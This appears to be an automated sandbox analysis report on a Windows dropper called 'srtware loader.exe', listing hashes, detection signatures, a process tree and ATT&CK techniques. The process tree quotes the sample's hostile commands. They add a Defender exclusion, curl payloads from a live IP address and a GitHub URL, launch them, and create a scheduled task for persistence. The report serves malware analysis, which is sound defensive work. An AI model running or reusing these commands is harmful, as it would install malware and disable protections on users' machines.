Resubmissions
17-11-2024 12:44
241117-pyzmeazjez 10Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-11-2024 12:44
Static task
static1
Behavioral task
behavioral1
Sample
srtware loader.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
srtware loader.exe
Resource
win10v2004-20241007-en
General
-
Target
srtware loader.exe
-
Size
1.1MB
-
MD5
de920407355f76c7ef087fafb1f8ae8c
-
SHA1
73ec5917b60133981764f57939c576a5ea94c2d5
-
SHA256
eedee87650ce6252c755af15d7065ca4292fc56dd5e848335dc8265ded837fc1
-
SHA512
4278b11aab909a92157f0a3221ae775c12088e6464f7a8f63ac58c3d4df29327565a97147d3a0d9a9647f83783dba6db7935c22a70c393e4e603e2dda44d9112
-
SSDEEP
24576:WLzpI+xRUz1EGES2zRP9RPVwzCBjzZg/amV8q2MBTZr5VlenU:6dxKNePXVKVLn1Vj
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1256 powershell.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/2504-2-0x0000000000380000-0x00000000006FC000-memory.dmp net_reactor behavioral1/memory/2504-128-0x0000000000380000-0x00000000006FC000-memory.dmp net_reactor -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 2504 srtware loader.exe 2504 srtware loader.exe 2504 srtware loader.exe 2504 srtware loader.exe 2504 srtware loader.exe 2504 srtware loader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language srtware loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2056 PING.EXE 2168 cmd.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2960 ipconfig.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2056 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1256 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1256 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2504 srtware loader.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2504 wrote to memory of 1256 2504 srtware loader.exe 31 PID 2504 wrote to memory of 1256 2504 srtware loader.exe 31 PID 2504 wrote to memory of 1256 2504 srtware loader.exe 31 PID 2504 wrote to memory of 1256 2504 srtware loader.exe 31 PID 2504 wrote to memory of 2856 2504 srtware loader.exe 33 PID 2504 wrote to memory of 2856 2504 srtware loader.exe 33 PID 2504 wrote to memory of 2856 2504 srtware loader.exe 33 PID 2504 wrote to memory of 2856 2504 srtware loader.exe 33 PID 2504 wrote to memory of 2756 2504 srtware loader.exe 35 PID 2504 wrote to memory of 2756 2504 srtware loader.exe 35 PID 2504 wrote to memory of 2756 2504 srtware loader.exe 35 PID 2504 wrote to memory of 2756 2504 srtware loader.exe 35 PID 2504 wrote to memory of 2840 2504 srtware loader.exe 37 PID 2504 wrote to memory of 2840 2504 srtware loader.exe 37 PID 2504 wrote to memory of 2840 2504 srtware loader.exe 37 PID 2504 wrote to memory of 2840 2504 srtware loader.exe 37 PID 2504 wrote to memory of 2972 2504 srtware loader.exe 39 PID 2504 wrote to memory of 2972 2504 srtware loader.exe 39 PID 2504 wrote to memory of 2972 2504 srtware loader.exe 39 PID 2504 wrote to memory of 2972 2504 srtware loader.exe 39 PID 2504 wrote to memory of 2768 2504 srtware loader.exe 42 PID 2504 wrote to memory of 2768 2504 srtware loader.exe 42 PID 2504 wrote to memory of 2768 2504 srtware loader.exe 42 PID 2504 wrote to memory of 2768 2504 srtware loader.exe 42 PID 2504 wrote to memory of 676 2504 srtware loader.exe 44 PID 2504 wrote to memory of 676 2504 srtware loader.exe 44 PID 2504 wrote to memory of 676 2504 srtware loader.exe 44 PID 2504 wrote to memory of 676 2504 srtware loader.exe 44 PID 2504 wrote to memory of 780 2504 srtware loader.exe 46 PID 2504 wrote to memory of 780 2504 srtware loader.exe 46 PID 2504 wrote to memory of 780 2504 srtware loader.exe 46 PID 2504 wrote to memory of 780 2504 srtware loader.exe 46 PID 780 wrote to memory of 1544 780 cmd.exe 48 PID 780 wrote to memory of 1544 780 cmd.exe 48 PID 780 wrote to memory of 1544 780 cmd.exe 48 PID 780 wrote to memory of 1544 780 cmd.exe 48 PID 2504 wrote to memory of 1148 2504 srtware loader.exe 49 PID 2504 wrote to memory of 1148 2504 srtware loader.exe 49 PID 2504 wrote to memory of 1148 2504 srtware loader.exe 49 PID 2504 wrote to memory of 1148 2504 srtware loader.exe 49 PID 1148 wrote to memory of 2960 1148 cmd.exe 51 PID 1148 wrote to memory of 2960 1148 cmd.exe 51 PID 1148 wrote to memory of 2960 1148 cmd.exe 51 PID 1148 wrote to memory of 2960 1148 cmd.exe 51 PID 2504 wrote to memory of 2892 2504 srtware loader.exe 52 PID 2504 wrote to memory of 2892 2504 srtware loader.exe 52 PID 2504 wrote to memory of 2892 2504 srtware loader.exe 52 PID 2504 wrote to memory of 2892 2504 srtware loader.exe 52 PID 2892 wrote to memory of 2884 2892 cmd.exe 54 PID 2892 wrote to memory of 2884 2892 cmd.exe 54 PID 2892 wrote to memory of 2884 2892 cmd.exe 54 PID 2892 wrote to memory of 2884 2892 cmd.exe 54 PID 2504 wrote to memory of 2168 2504 srtware loader.exe 55 PID 2504 wrote to memory of 2168 2504 srtware loader.exe 55 PID 2504 wrote to memory of 2168 2504 srtware loader.exe 55 PID 2504 wrote to memory of 2168 2504 srtware loader.exe 55 PID 2168 wrote to memory of 2056 2168 cmd.exe 57 PID 2168 wrote to memory of 2056 2168 cmd.exe 57 PID 2168 wrote to memory of 2056 2168 cmd.exe 57 PID 2168 wrote to memory of 2056 2168 cmd.exe 57 PID 2504 wrote to memory of 1856 2504 srtware loader.exe 58 PID 2504 wrote to memory of 1856 2504 srtware loader.exe 58 PID 2504 wrote to memory of 1856 2504 srtware loader.exe 58 PID 2504 wrote to memory of 1856 2504 srtware loader.exe 58
Processes
-
C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl http://79.110.49.246/didedba/abc -o %localappdata%/Temp/fff.scr2⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl http://79.110.49.246/didedba/adderall -o %localappdata%/Temp/qqq.scr2⤵
- System Location Discovery: System Language Discovery
PID:2756
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl http://79.110.49.246/didedba/write -o %localappdata%/Temp/ddd.scr2⤵
- System Location Discovery: System Language Discovery
PID:2840
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c curl https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o %localappdata%/Temp/srtware.exe2⤵
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start %localappdata%/Temp/fff.scr2⤵
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start %localappdata%/Temp/qqq.scr2⤵
- System Location Discovery: System Language Discovery
PID:676
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c schtasks /create /tn "chromeupdatecc" /tr "%localappdata%\Temp\qqq.scr" /sc onstart /rl highest /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "chromeupdatecc" /tr "C:\Users\Admin\AppData\Local\Temp\qqq.scr" /sc onstart /rl highest /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ipconfig /flushdns2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c netsh winsock reset2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\netsh.exenetsh winsock reset3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2884
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping google.com2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\PING.EXEping google.com3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2056
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start %localappdata%/Temp/srtware.exe2⤵
- System Location Discovery: System Language Discovery
PID:1856
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1